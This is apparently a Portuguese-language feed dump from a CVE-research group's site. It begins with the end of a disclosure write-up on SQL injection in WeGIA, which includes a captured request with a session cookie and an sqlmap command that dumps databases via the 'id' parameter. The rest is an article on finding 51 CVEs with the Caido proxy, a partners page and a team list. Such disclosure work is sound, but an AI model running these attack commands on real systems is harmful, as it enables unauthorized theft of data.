pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7 </span></span><span class="line"><span class="cl">Cookie: _ga=GA1.1.2068698375.1747601288; _ga_F8DXBXLV8J=GS2.1.s1747660538$o4$g0$t1747660538$j60$l0$h0$dyaL3bJ27Uic34e3jqHnkw5lGenE0npxF8g; PHPSESSID=o79b1cq9suo2gksfpnvr4cus4o </span></span></code></pre></td></tr></table> </div> </div><p>Em seguida, use o sqlmap:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">sqlmap -r req -p id --risk=3 --level=5 --dbs --batch --dbms=mysql --batch </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-52474/image.png" width="1263" height="568" srcset="/p/cve-2025-52474/image_hu_41d3edbfdda17cfa.png 480w, /p/cve-2025-52474/image_hu_6c25fed07133c2cd.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="222" data-flex-basis="533px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados sensíveis: Um invasor pode acessar informações confidenciais, como credenciais, dados pessoais ou financeiros.</li> <li>Comprometimento de contas de usuários: Usando credenciais roubadas, invasores podem obter acesso total ao aplicativo e executar ações em nome de usuários legítimos.</li> <li>Exfiltração de dados: Possibilidade de roubo de grandes volumes de informações, despejando tabelas inteiras do banco de dados.</li> <li>Danos à reputação: Expor dados de clientes ou informações comerciais pode prejudicar significativamente a Imagem da organização.</li> <li>Execução de ataques em cadeia: As informações obtidas podem ser usadas para realizar novos ataques, como phishing direcionado ou ataques a sistemas interconectados.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rwvh-2gfh-wmcm" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rwvh-2gfh-wmcm</a></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>Por: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 19 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/pt/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/ https://www.cvehunters.com/pt/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/ <h2 id="contribuições-do-grupo-cve-hunters-usando-o-caido">Contribuições do Grupo CVE-Hunters usando o Caido </h2><p style="text-align: justify;">A segurança da informação é uma ajuda preciosa para o design, instalação e atualização contínua de sistemas computacionais, especialmente para uso público, sem fins lucrativos ou educacional. Com o aumento dos ataques cibernéticos e vazamentos de dados, nunca foi tão crítico melhorar a segurança dos projetos open source.</p> <p style="text-align: justify;">Nosso grupo, CVE-Hunters, se esforça para encontrar, pesquisar e divulgar de forma responsável vulnerabilidades (CVEs) em softwares de código aberto amplamente utilizados. Contribuímos com a comunidade global de cibersegurança relatando CVEs, melhorando a segurança do código e ajudando os mantenedores a corrigirem vulnerabilidades de segurança do mundo real antes que se tornem alvos de ataques.</p><h2 id="contribuições-do-grupo-cve-hunters-usando-o-caido">Contribuições do Grupo CVE-Hunters usando o Caido </h2><p style="text-align: justify;">A segurança da informação é uma ajuda preciosa para o design, instalação e atualização contínua de sistemas computacionais, especialmente para uso público, sem fins lucrativos ou educacional. Com o aumento dos ataques cibernéticos e vazamentos de dados, nunca foi tão crítico melhorar a segurança dos projetos open source.</p> <p style="text-align: justify;">Nosso grupo, CVE-Hunters, se esforça para encontrar, pesquisar e divulgar de forma responsável vulnerabilidades (CVEs) em softwares de código aberto amplamente utilizados. Contribuímos com a comunidade global de cibersegurança relatando CVEs, melhorando a segurança do código e ajudando os mantenedores a corrigirem vulnerabilidades de segurança do mundo real antes que se tornem alvos de ataques.</p> <p style="text-align: justify;">Por meio de pesquisas de vulnerabilidade no trabalho e testes de penetração ao vivo, nosso programa não apenas protege aplicações web críticas, mas também oferece treinamento prático para a futura geração de hackers éticos e especialistas em cibersegurança. Buscamos fomentar uma cultura de cibersegurança ativa, aberta e inclusiva — permitindo que estudantes e pesquisadores utilizem ferramentas de ponta como o Caido para realizar ataques simulados, automatizar testes de segurança e facilitar práticas de desenvolvimento seguro.</p> <h2 id="objetivos-do-projeto">Objetivos do Projeto </h2><p style="text-align: justify;">Nossa pesquisa em cibersegurança se apoia em três pilares centrais que sustentam a excelência técnica e a responsabilidade social:</p> <p style="text-align: justify;"> <ul> <li>Reforçar a segurança de softwares open source comumente utilizados por meio da descoberta, verificação e apoio à correção de vulnerabilidades do mundo real. Esses bugs centrais — como Cross-Site Scripting (XSS), Insecure Direct Object References (IDOR) ou autenticação falha — podem ser explorados em produção, expondo informações sensíveis.</li> <li>Oferecer treinamento experiencial em cibersegurança para futuros profissionais por meio de projetos reais de avaliação de vulnerabilidades. Os estudantes ganham experiência prática em descoberta de bugs, análise de código seguro e divulgação ética de vulnerabilidades usando ferramentas modernas como Caido, Burp Suite e scripts de automação personalizados.</li> <li>Incentivar a pesquisa colaborativa e a publicação responsável de CVEs (Common Vulnerabilities and Exposures) para facilitar a conscientização sobre ameaças emergentes, melhorar a transparência e ajudar no fortalecimento contínuo de sistemas críticos.</li> </ul> </p> <h2 id="case-1-platforma-wegia">Case 1: Platforma WeGIA </h2><p><img src="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/wegia.png" width="1914" height="959" srcset="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/wegia_hu_2524eec9eeae804c.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/wegia_hu_91fc3ba8afe4f7ad.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="199" data-flex-basis="478px" /></p> <p style="text-align: justify;">Um dos principais alvos de nossa pesquisa em segurança foi a aplicação web WeGIA (Web Manager for Assistance Institutions) — uma aplicação open source para gerenciamento de instituições do terceiro setor no Brasil, incluindo ONGs, abrigos sociais e instituições sem fins lucrativos. Tais organizações dependem fortemente de doações, apoio voluntário e processamento seguro de dados para funcionar de forma eficaz.</p> <p style="text-align: justify;">As falhas de segurança descobertas incluíram vulnerabilidades críticas como acesso não autorizado, processos de autenticação inadequados e exposição de dados com impacto considerável na confidencialidade, integridade e disponibilidade de informações sensíveis. Em um desafio colaborativo fascinante de pentest, a comunidade CVE-Hunters descobriu, divulgou de forma responsável e reavaliou 48 vulnerabilidades (CVEs) no sistema WeGIA.</p> <p style="text-align: justify;">A correção eficaz e a descoberta dessas falhas contribuíram para o status geral de segurança da plataforma e facilitaram a sustentabilidade e confiabilidade do software a longo prazo. Este caso reforça a necessidade de escaneamento constante de vulnerabilidades e a presença do hacking ético na defesa de ferramentas open source utilizadas em contextos sociais críticos.</p> <h2 id="case-2-platforma-i-educar">Case 2: Platforma i-Educar </h2><p><img src="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/i-educar.png" width="1914" height="962" srcset="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/i-educar_hu_4322185b1b88d839.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/i-educar_hu_1cac18ecedf8c1b3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="198" data-flex-basis="477px" /></p> <p style="text-align: justify;">Dando continuidade ao nosso esforço para promover a segurança cibernética da infraestrutura digital crítica, nossa equipe de pesquisa direcionou seu foco para a plataforma i-Educar, um sistema de gestão escolar open source amplamente adotado por escolas públicas e instituições de ensino no Brasil.</p> <p style="text-align: justify;">O i-Educar é projetado para lidar com dados sensíveis de estudantes, incluindo informações pessoais dos alunos, professores e históricos escolares. Isso torna a plataforma um alvo privilegiado para possíveis atacantes, o que reforça a importância de protegê-la contra ameaças futuras.</p> <p style="text-align: justify;">Durante uma auditoria profissional de segurança de aplicações, nossa equipe de pesquisadores encontrou outras vulnerabilidades no sistema i-Educar. Estas incluíam bypass de autenticação, exposição insegura de dados e controles de acesso inadequados — que podem comprometer a confidencialidade, integridade e disponibilidade das informações educacionais.</p> <p style="text-align: justify;">Até o momento, 3 das vulnerabilidades receberam oficialmente IDs de CVE e foram divulgadas de forma responsável aos mantenedores do projeto seguindo as melhores práticas de divulgação coordenada. As demais descobertas estão aguardando validação técnica e documentação e serão submetidas para publicação como CVE nas próximas semanas.</p> <p style="text-align: justify;">Este estudo de caso ilustra a importância da pesquisa de vulnerabilidades para a comunidade educacional, especialmente ao lidar com plataformas open source que armazenam informações pessoais identificáveis (PII). Ao proteger o i-Educar, estamos comprometidos em construir uma comunidade online mais segura para escolas e estudantes.</p> <h2 id="ferramenta-de-suporte-caido">Ferramenta de Suporte: Caido </h2><p><img src="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/caido.webp" width="2600" height="1417" srcset="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/caido_hu_9c404777f95c89b8.webp 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/caido_hu_352aa15174226705.webp 1024w" loading="lazy" class="gallery-image" data-flex-grow="183" data-flex-basis="440px" /></p> <p style="text-align: justify;">Em nossos testes aprofundados de segurança de aplicações web, o Caido tem sido uma de nossas ferramentas preferidas para descobrir, explorar e documentar vulnerabilidades. Criado para pentesters, pesquisadores de segurança e caçadores de bugs, o Caido é uma alternativa moderna e leve ao Burp Suite, com uma interface amigável sem perder funcionalidades.</p> <p style="text-align: justify;">Com funcionalidades voltadas para hacking ético e pentests em aplicações web, o Caido permite fluxos de trabalho eficientes tanto em ambientes manuais quanto semi-automatizados. A capacidade do Caido de interceptar tráfego, mapear a estrutura de sites e gerenciar grandes volumes de requisições HTTP o qualifica para identificar problemas como XSS, CSRF, IDOR, falhas de autenticação e gerenciamento inseguro de sessões.</p> <p style="text-align: justify;">Além de sua interface limpa e fluidez, o design do Caido é escalável — tornando-o uma das melhores ferramentas para profissionais de segurança que buscam um scanner e ferramenta de exploração de vulnerabilidades web em nível corporativo para uso em cenários reais. Seja para testar o OWASP Top 10 ou realizar auditorias técnicas profundas, o Caido é um componente essencial do kit de ferramentas de segurança ofensiva no mundo moderno.</p> <h3 id="interface-simples-e-funcional"><em>Interface simples e funcional</em> </h3><p><img src="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/interface.png" width="974" height="738" srcset="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/interface_hu_946c678debb29535.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/interface_hu_5a3572f402be32ad.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="131" data-flex-basis="316px" /></p> <p style="text-align: justify;">O Caido possui uma interface minimalista, moderna e amigável, projetada para facilitar o processo de pentest em aplicações web. Recursos úteis como mapa dinâmico do site, histórico completo de navegação e interceptação em tempo real do tráfego HTTP permitem que pesquisadores de segurança tenham ampla visibilidade sobre a estrutura e operação da aplicação alvo.</p> <p style="text-align: justify;">Isso permite identificar vetores de ataque potenciais de forma mais rápida e precisa, fazendo do Caido a solução preferida entre profissionais que buscam uma plataforma fácil de usar e poderosa para exploração de requisições em tempo real, inspeção de parâmetros e detecção de vulnerabilidades. Desde o mapeamento de endpoints complexos até a análise de sessões ao vivo, o Caido otimiza o processo sem comprometer profundidade ou precisão.</p> <h3 id="automação-com"><em>Automação com “Automate”</em> </h3><p><img src="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/automate.png" width="1424" height="627" srcset="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/automate_hu_b71d2686d66b9f75.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/automate_hu_1ff1724a47fc979e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="227" data-flex-basis="545px" /></p> <p style="text-align: justify;">O recurso "Automate" do Caido permite que profissionais de segurança configurem e executem varreduras de vulnerabilidade personalizadas com precisão e velocidade. É especialmente útil na automação da detecção de vulnerabilidades comuns em aplicações web, como XSS, CSRF, IDOR e falhas de autenticação ou gerenciamento de sessão.</p> <p style="text-align: justify;">Com suporte para automação de testes com scripts e injeção de payloads personalizados, a funcionalidade Automate do Caido reduz significativamente o trabalho manual, mas aumenta a precisão na identificação de falhas de segurança em ambientes web complexos. É uma adição ideal para pentesters e caçadores de bugs que desejam melhorar seus testes com varreduras automatizadas e eficientes adaptadas ao seu escopo.</p> <h3 id="gerenciamento-de-projetos"><em>Gerenciamento de projetos</em> </h3><p><img src="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/scopes.png" width="882" height="451" srcset="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/scopes_hu_3ab3440b6ccc98cc.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/scopes_hu_827f3f99ffd7ccda.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="195" data-flex-basis="469px" /></p> <p style="text-align: justify;">O Caido oferece suporte a procedimentos eficientes de pentest com a capacidade de trabalhar em vários projetos simultaneamente sem precisar reiniciar o aplicativo. Esse tipo de funcionalidade é essencial para especialistas que conduzem múltiplos testes de segurança ao mesmo tempo, permitindo alternância fácil entre alvos sem comprometer a integridade das informações.</p> <p style="text-align: justify;">Para tornar o gerenciamento de campanhas de pentest ainda mais simples, o Caido possui um recurso completo chamado Scopes. Com ele, os usuários podem definir, segmentar e gerenciar escopos de teste múltiplos dentro de um único projeto. Isso é útil para segmentar testes em diferentes domínios, aplicações ou ambientes — melhorando a organização, reduzindo ruídos e apoiando uma análise de vulnerabilidades mais direcionada.</p> <p style="text-align: justify;">Ao combinar a capacidade de múltiplos projetos com testes limitados por escopo, o Caido mantém pentesters, caçadores de bugs e pesquisadores de segurança produtivos, eficazes e concentrados nos bugs mais importantes.</p> <p style="text-align: justify;">By combining multi-project capability with scope-limited testing via environments, Caido keeps penetration testers, bug bounty hunters, and security researchers productive, effective, and concentrated on the most important bugs.</p> <h3 id="filtros-com-httpql"><em>Filtros com HTTPQL</em> </h3><p><img src="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/filters.png" width="1324" height="422" srcset="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/filters_hu_c24f37b46942eccd.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/filters_hu_b74b8191f7d2bf3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="313" data-flex-basis="752px" /></p> <p style="text-align: justify;">O mecanismo de busca HTTPQL do Caido oferece filtragem precisa e exame minucioso de requisições HTTP, mesmo em tráfego web pesado. Como pesquisador de segurança e pentester, essa linguagem de consulta concisa e direta ajuda você a navegar rapidamente por grandes volumes de dados sem precisar ser um programador experiente.</p> <p style="text-align: justify;">Com o HTTPQL, a filtragem avançada de requisições se torna mais fácil de implementar, acelerando a identificação de falhas de segurança como pontos de injeção, erros de autenticação e irregularidades de sessão, tornando-o uma ferramenta essencial para auditorias automatizadas de tráfego web e testes de vulnerabilidades em larga escala.</p> <p style="text-align: justify;">O Caido também se destaca ao oferecer recursos de ponta que o tornam mais forte em cenários reais de pentest e auditoria de segurança:</p> <p style="text-align: justify;"> <ul> <li><b>Proxy invisível:</b> Captura e salva convenientemente o tráfego de rede de clientes e dispositivos que não suportam configuração manual de proxy. Isso é especialmente útil ao testar softwares embarcados, dispositivos IoT, aplicativos móveis e navegadores bloqueados para análises profundas de segurança em casos difíceis de testar.</li> <li><b>Substituição de DNS:</b> Fornece controle refinado sobre a resolução de nomes de domínio durante testes de segurança, permitindo que pentesters falsifiquem DNS, redirecionem tráfego e criem casos de teste realistas. É essencial para verificar vulnerabilidades relacionadas a DNS, realizar ataques de phishing e analisar vetores complexos de ataque em rede.</li> <li><b>Integração com navegador:</b> Facilita a inspeção instantânea e dinâmica do tráfego HTTP/HTTPS de navegadores modernos, incluindo aqueles fortemente baseados em JavaScript e carregamento dinâmico de conteúdo. A integração melhora a eficiência nos testes de aplicações web altamente interativas, aplicações de página única (SPA) e ambientes de cliente rico, permitindo a detecção de XSS, problemas de autenticação e outros ataques client-side.</li> </ul> </p> <h2 id="sobre-o-grupo-cve-hunters-formação-evolução-e-missão">Sobre o Grupo CVE-Hunters: Formação, Evolução e Missão </h2><p><img src="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/repo.png" width="674" height="848" srcset="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/repo_hu_1766647e601cd925.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/repo_hu_70e520e1660c3d3e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="79" data-flex-basis="190px" /></p> <p style="text-align: justify;">O CVE-Hunters é um grupo de pesquisa dedicado à segurança da informação, especializado na descoberta, análise e divulgação responsável de vulnerabilidades em aplicativos de software críticos. Fundado em dezembro de 2024 pelo especialista em segurança cibernética, Professor <a href="https://www.linkedin.com/in/nmmorette">Natan Morette</a>, o grupo começou com apenas quatro alunos apaixonados, ansiosos por aprofundar seus conhecimentos em segurança ofensiva e hacking ético.</p> <p style="text-align: justify;">Sob a orientação técnica e ética especializada do Professor <a href="https://www.linkedin.com/in/nmmorette">Natan</a>, o CVE-Hunters cresceu e amadureceu de forma constante. Hoje, contamos com orgulho com 10 pesquisadores ativos em segurança cibernética que aplicam as habilidades práticas aprendidas tanto em ambientes acadêmicos quanto em ambientes de laboratório. Nossas principais áreas de foco incluem testes de penetração, avaliação de vulnerabilidades, publicação de CVE e contribuição para o fortalecimento da segurança de projetos de código aberto impactantes com relevância social significativa.</p> <p style="text-align: justify;">Nosso trabalho de pesquisa e desenvolvimento está em constante evolução. Estamos analisando ativamente novas falhas de segurança, documentando detalhes técnicos e preparando divulgações de vulnerabilidades responsáveis ​​adicionais para a comunidade.</p> <p style="text-align: justify;">Para saber mais sobre os membros da nossa equipe, explorar nossos projetos em andamento e acompanhar as últimas publicações do CVE, visite nosso repositório oficial do GitHub em: <a href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters">https://github.com/Sec-Dojo-Cyber-House/cve-hunters</a>.</p> <p style="text-align: justify;">Todas as vulnerabilidades identificadas e CVEs oficialmente publicadas pelo CVE-Hunters são catalogadas de forma transparente e acessíveis em nosso site oficial: <a href="https://sec-dojo-cyber-house.github.io/">https://sec-dojo-cyber-house.github.io/</a>.</p> <h2 id="escrito-por">Escrito por </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="colaboradores">Colaboradores </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>Por: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 04 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/pt/archives/ https://www.cvehunters.com/pt/archives/ Sun, 06 Mar 2022 00:00:00 +0000 https://www.cvehunters.com/pt/support/ https://www.cvehunters.com/pt/support/ <p>Saiba mais sobre nossos parceiros e patrocinadores abaixo:</p> <h2 id="parceiros">Parceiros </h2><table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://azure.microsoft.com/pt-br/"> <img src="/support/azure.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://caido.io/"> <img src="/support/caido.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://hacktiba.github.io/"> <img src="/support/hacktiba.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://azure.microsoft.com/pt-br/">Azure</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://caido.io/">caido</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://hacktiba.github.io/">Hacktiba</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://vuldb.com/"> <img src="/support/vuldb.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://vuldb.com/">VulDB</a></td> </tr> </tbody> </table> <h2 id="patrocinadores">Patrocinadores </h2><table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://institutoumpassodecadavez.org/"> <img src="instituto-um-passo-de-cada-vez.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://future.com.br/"> <img src="future.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://institutoumpassodecadavez.org/">Instituto Um Passo</br>de Cada Vez</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://future.com.br/">future</a></td> </tr> </tbody> </table><p>Saiba mais sobre nossos parceiros e patrocinadores abaixo:</p> <h2 id="parceiros">Parceiros </h2><table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://azure.microsoft.com/pt-br/"> <img src="/support/azure.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://caido.io/"> <img src="/support/caido.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://hacktiba.github.io/"> <img src="/support/hacktiba.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://azure.microsoft.com/pt-br/">Azure</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://caido.io/">caido</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://hacktiba.github.io/">Hacktiba</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://vuldb.com/"> <img src="/support/vuldb.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://vuldb.com/">VulDB</a></td> </tr> </tbody> </table> <h2 id="patrocinadores">Patrocinadores </h2><table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://institutoumpassodecadavez.org/"> <img src="instituto-um-passo-de-cada-vez.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://future.com.br/"> <img src="future.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://institutoumpassodecadavez.org/">Instituto Um Passo</br>de Cada Vez</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://future.com.br/">future</a></td> </tr> </tbody> </table> Mon, 01 Jan 0001 00:00:00 +0000 https://www.cvehunters.com/pt/team/ https://www.cvehunters.com/pt/team/ <p>Você pode encontrar links úteis para repositórios e colaboradores abaixo:</p> <h2 id="fundador">Fundador </h2><table border="1" style="max-width: 155px;"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/nmmorette/"> <img src="/assets/contributors/natan.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/nmmorette/">Natan Maia<br> Morette</a></td> </tr> </tbody> </table> <h2 id="colaboradores">Colaboradores </h2><table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/angelo-morette-019/"> <img src="/assets/contributors/angelo.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/diegocbcastro/"> <img src="/assets/contributors/diego.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/elisangelasilvademendonca/"> <img src="/assets/contributors/elisangela.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/angelo-morette-019/">Angelo<br>Morette</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/diegocbcastro/">Diego<br>Castro</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/elisangelasilvademendonca/">Elisângela<br>Mendonça</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/f%C3%AAmartins/"> </a><br> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/isadora-cristina-a0580014b/"> <img src="/assets/contributors/isadora.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/itauan"> <img src="/assets/contributors/itauan.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/f%C3%AAmartins/">Fernanda<br>Martins</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/isadora-cristina-a0580014b/">Isadora<br>Novaes</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/itauan">Itauan<br>Santos</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/karina-gante/"> <img src="/assets/contributors/karina.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="http://www.linkedin.com/in/marceloqueirozjr"> <img src="/assets/contributors/marcelo.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/marcos-tolosa/"> <img src="/assets/contributors/marcos.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/karina-gante/">Karina<br>Gante</a></td> <td style="text-align: center; font-weight: bold;"><a href="http://www.linkedin.com/in/marceloqueirozjr">Marcelo<br>Queiroz</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/marcos-tolosa/">Marcos<br>Tolosa</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=android_app"> <img src="/assets/contributors/pedro.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/rafael-corvino/"> <img src="/assets/contributors/rafael.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/"> <img src="/assets/contributors/raul.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=android_app">Pedro<br>Lyrio</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/rafael-corvino/">Rafael<br>Corvino</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/">Raul<br>Pazemécxas</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/samaragama?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=ios_app"> <img src="/assets/contributors/samara.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/ta%C3%ADza-oliveira"> <img src="/assets/contributors/taiza.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://br.linkedin.com/in/thiagoescarrone"> <img src="/assets/contributors/thiago.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/samaragama?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=ios_app">Samara<br>Gama</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/ta%C3%ADza-oliveira">Taíza<br>Oliveira</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://br.linkedin.com/in/thiagoescarrone">Thiago<br>Escarrone</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/vanderlei-princival/"> <img src="/assets/contributors/vanderlei.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="http://www.linkedin.com/in/vinicius-gross-castro"> <img src="/assets/contributors/viniciusCastro.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/vinicius-marim-melfi-4b937b155/"> <img src="/assets/contributors/vinicius.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/vanderlei-princival/">Vanderlei<br>Princival</a></td> <td style="text-align: center; font-weight: bold;"><a href="http://www.linkedin.com/in/vinicius-gross-castro">Vinicius<br>Castro</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/vinicius-marim-melfi-4b937b155/">Vinícius<br>Melfi</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/yago-dyogennes/"> <img src="/assets/contributors/yago.png" 